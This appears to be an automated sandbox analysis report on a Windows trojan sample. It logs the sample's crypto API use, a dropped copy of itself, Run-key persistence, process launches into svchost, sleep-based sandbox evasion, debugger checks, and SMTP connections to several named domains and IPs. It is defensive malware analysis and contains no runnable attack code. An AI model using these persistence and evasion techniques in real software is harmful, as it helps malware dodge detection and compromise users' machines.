                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02529FC7 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_02529FC7
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252A137 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_0252A137
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_04008800
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_04008970
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_04008A70
                      Source: fs7AQcREFX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02531A5F0_2_02531A5F
                      Source: fs7AQcREFX.exeReversingLabs: Detection: 24%
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile read: C:\Users\user\Desktop\fs7AQcREFX.exeJump to behavior
                      Source: fs7AQcREFX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\fs7AQcREFX.exe C:\Users\user\Desktop\fs7AQcREFX.exe
                      Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                      Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@19/4@1964/100
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_000F15C0 CoCreateInstance,0_2_000F15C0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeMutant created: \Sessions\1\BaseNamedObjects\pigalicapi
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_000F21A0 lstrlenW,_malloc,WideCharToMultiByte,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary,0_2_000F21A0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCommand line argument: RICHED20.DLL0_2_000FA0B0
                      Source: C:\Users\user\pigalicapi.exeCommand line argument: RICHED20.DLL1_2_0080A0B0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\pigalicapi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: fs7AQcREFX.exeStatic PE information: More than 8191 > 100 exports found
                      Source: fs7AQcREFX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: fs7AQcREFX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: fs7AQcREFX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: fs7AQcREFX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: fs7AQcREFX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: fs7AQcREFX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00108FA5 push ecx; ret 0_2_00108FB8
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252D643 pushfd ; retf 0_2_0252D648
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00818FA5 push ecx; ret 1_2_00818FB8
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0010CC0C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0010CC0C

                      Persistence and Installation Behavior

                      barindex
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f523c7.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.252053f.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.25223c7.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.25223c7.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.9423c7.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.984088.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.9423c7.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f5053f.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.94053f.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f5053f.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.94053f.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.2b54088.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.f523c7.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.2554088.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.984088.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.2554088.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fs7AQcREFX.exe.252053f.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.pigalicapi.exe.4000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.pigalicapi.exe.2b54088.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.719025818.0000000002B54000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.714243220.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.720083201.0000000002554000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.714052838.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.714796966.0000000000984000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\pigalicapi.exeStalling execution: Execution stalls by calling Sleep
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeStalling execution: Execution stalls by calling Sleepgraph_0-19145
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_04003B00
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,VirtualFree,Sleep,ExitProcess,0_2_025252C7
                      Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_04003B00
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exe TID: 6952Thread sleep time: -40000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exe TID: 6976Thread sleep time: -35000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exe TID: 6996Thread sleep time: -43200000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 6096Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 6072Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 6844Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 6112Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 5736Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\pigalicapi.exe TID: 6004Thread sleep time: -21600000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2080Thread sleep count: 240 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5420Thread sleep time: -90000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 3776Thread sleep count: 155 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 3084Thread sleep count: 670 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 968Thread sleep count: 666 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 1976Thread sleep count: 830 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 1708Thread sleep count: 861 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 6576Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5684Thread sleep count: 303 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 5628Thread sleep count: 315 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 2064Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 23132Thread sleep count: 71 > 30
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-19545
                      Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodes
                      Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                      Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-20098
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 670
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 666
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 830
                      Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 861
                      Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-19247
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-19526
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: GetAdaptersInfo,0_2_04009F70
                      Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,1_2_04009F70
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00105EB0 VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,0_2_00105EB0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeAPI call chain: ExitProcess graph end nodegraph_0-19113
                      Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end node
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393636263.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391362964.00000000061B6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389856090.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.00000000061A5000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391362964.0000000006187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: fs7AQcREFX.exe, 00000000.00000003.385517918.000000000292F000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000000.369637248.0000000000120000.00000002.00000001.01000000.00000003.sdmp, fs7AQcREFX.exe, 00000000.00000003.388234368.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yhemIyHGFSpWrLkbdYHtip
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00107840 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00107840
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00105EB0 VirtualProtect ?,-00000001,00000104,?0_2_00105EB0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_04001CA0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0010CC0C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0010CC0C
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_001054F5 GetProcessHeap,HeapFree,0_2_001054F5
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00104660 mov ecx, dword ptr fs:[00000030h]0_2_00104660
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04003090 mov eax, dword ptr fs:[00000030h]0_2_04003090
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252F357 mov eax, dword ptr fs:[00000030h]0_2_0252F357
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02524857 mov eax, dword ptr fs:[00000030h]0_2_02524857
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02520467 mov eax, dword ptr fs:[00000030h]0_2_02520467
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252096F mov eax, dword ptr fs:[00000030h]0_2_0252096F
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02551030 mov eax, dword ptr fs:[00000030h]0_2_02551030
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00814660 mov ecx, dword ptr fs:[00000030h]1_2_00814660
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04003090 mov eax, dword ptr fs:[00000030h]1_2_04003090
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_02B51030 mov eax, dword ptr fs:[00000030h]1_2_02B51030
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00104820 LdrInitializeThunk,0_2_00104820
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00107840 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00107840
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_001059E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001059E6
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_00109CD1 SetUnhandledExceptionFilter,0_2_00109CD1
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_04003B00
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_025252C7 GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,VirtualFree,Sleep,ExitProcess,0_2_025252C7
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00817840 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00817840
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_008159E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_008159E6
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00819CD1 SetUnhandledExceptionFilter,1_2_00819CD1
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_04003B00

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.7.17 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
